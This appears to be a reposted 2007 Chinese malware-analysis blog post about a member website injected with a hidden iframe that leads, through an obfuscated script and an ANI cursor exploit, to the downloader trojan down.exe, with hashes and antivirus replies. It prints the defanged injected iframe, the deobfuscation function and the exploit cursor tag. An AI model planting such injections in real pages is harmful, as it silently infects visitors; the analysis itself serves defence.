某VIP会员站被挂马 Trojan.Win32.Agent.vty/ down.exe
来源:互联网 发布:java开源大全 编辑:程序博客网 时间:2024/04/28 06:46
某VIP会员站被挂马 down.exe
endurer 原创
2007-08-23 第2版 补充 瑞星 和 Kaspersky 的回复
2007-08-23 第1版
有网友反映,他的电脑中的php文件里老是被写入<iframe src=hxxp://down***.***onlinedowns.net/page**/image***/pd.htm height=0 ></iframe >代码。
打开 hxxp://down***.***onlinedowns.net/page**/image***/pd.htm,居然显示出错页:正在查找的网页可能已被删除、重命名或暂时不可用。
检查发现这是个伪造的出错页,其中包含代码:
/---
<script language="Jscript.encode" src=css.js></script>
<iframe src=hxxp://down***.***onlinedowns.net/page**/image***//top2.htm width=0 height=0>
---/
css.js 包含用 eval()执行的代码,经过3次解密后得到原始代码,其中使用了自定义解密函数:
/---
function RrRrRrRr(teaabb) {var tttmmm="";l=teaabb~length;www=hhhhffff=Math~round(l/2);if(l<2*www) hhhhffff=hhhhffff-1;for(i=0;i<hhhhffff;i++)tttmmm = tttmmm + teaabb~charAt(i)+ teaabb~charAt(i+hhhhffff);if(l<2*www) tttmmm = tttmmm + teaabb~charAt(l-1);document~write(tttmmm);};
---/
整个代码实现功能是下载 down.exe,通过创建和执行 autoexebc.bat、system32.vbs 来启动 down.exe。
文件说明符 : D:/test/down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-8-20 12:31:57
修改时间 : 2007-8-20 12:31:49
访问时间 : 2007-8-20 12:35:30
大小 : 10689 字节 10.449 KB
MD5 : af2b974b3a49fb05eecab13759f163f5
hxxp://down***.***onlinedowns.net/page**/image***/top2.htm 显示的是:Service Unavailable,其中包含代码:
/---
<DIV style="CURSOR: url('./top.jpg')"></DIV>
---/
top.jpg 利用 ANI 漏洞下载 down.exe。
主 题: 病毒上报邮件分析结果-流水单号:20070823124121723506 发件人: "" <send@rising.net.cn> 发送时间:2007.08.23 13:02
尊敬的客户,您好!
您的邮件已经收到,感谢您对瑞星的支持。
我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:down.exe
病毒名:Trojan.Win32.Agent.vty
您所上报的病毒文件将在19.37.32版本中处理解决。
主 题: RE: down.exe [KLAB-2759327] 发件人: "" <newvirus@kaspersky.com> 发送时间:2007.08.23 17:11
Hello.
New malicious software was found in the attached file.
Trojan-Downloader.Win32.Small.ege
It's detection will be included in the next update. Thank you for your help.
-----------------
Regards, Roman Gavrilchenko
Virus Analyst, Kaspersky Lab.
- 某VIP会员站被挂马 Trojan.Win32.Agent.vty/ down.exe
- 某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
- Trojan-Proxy.Win32.Agent.if木马 -SVOHOST.EXE
- [07-01-06]打开某IT技术问答网站时自动下载文件sinze.exe/Trojan-Dropper.Win32.Agent.awq
- auto.exe/Backdoor.Win32.Agent.bgu,b8u6bvx912.sys/Trojan-Downloader.Win32.Hmir.don等1
- auto.exe/Backdoor.Win32.Agent.bgu,b8u6bvx912.sys/Trojan-Downloader.Win32.Hmir.don等2
- 某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
- 某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
- 某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
- 某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
- 某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt
- 恢复被"Trojan-Downloader.Win32.Agent.ben"感染的exe文件
- 修改系统日期、替换explorer.exe的Trojan-Downloader.Win32.Agent.rjq1
- 修改系统日期、替换explorer.exe的Trojan-Downloader.Win32.Agent.rjq2
- 木马程序 Trojan-Downloader.Win32.Agent.bbb
- 遭遇trojan-downloader.win32.agent.vjh
- 遭遇Trojan.DL.Win32.Autorun.yuz,Trojan.Win32.Inject.gh,Trojan.Win32.Agent.zsq等
- 遭遇 qfgsw.sys / Trojan-Downloader.Win32.Agent.bbb / Trojan.Win32.Agent.bvl等
- 在struts框架下数据库表单与网页表单的设计
- vsFTPd 服务器初学者指南
- 全排列javascript算法
- AMD的虚拟化技术
- (转)Spring 的优秀工具类盘点,第 1 部分: 文件资源操作和 Web 相关工具类
- 某VIP会员站被挂马 Trojan.Win32.Agent.vty/ down.exe
- 旅顺南路发现一卡丁车赛场
- 输出调试信息的代码段
- 理解 Linux 配置文件
- Skype赔偿事件的背后
- 用VS2005制作WinForm安装包
- 枚举数组接口
- uclinux中, 有内存碎片(memory fragment),还是少用busybox
- 公布申能股份(股票代码:600642)阻力(支撑)位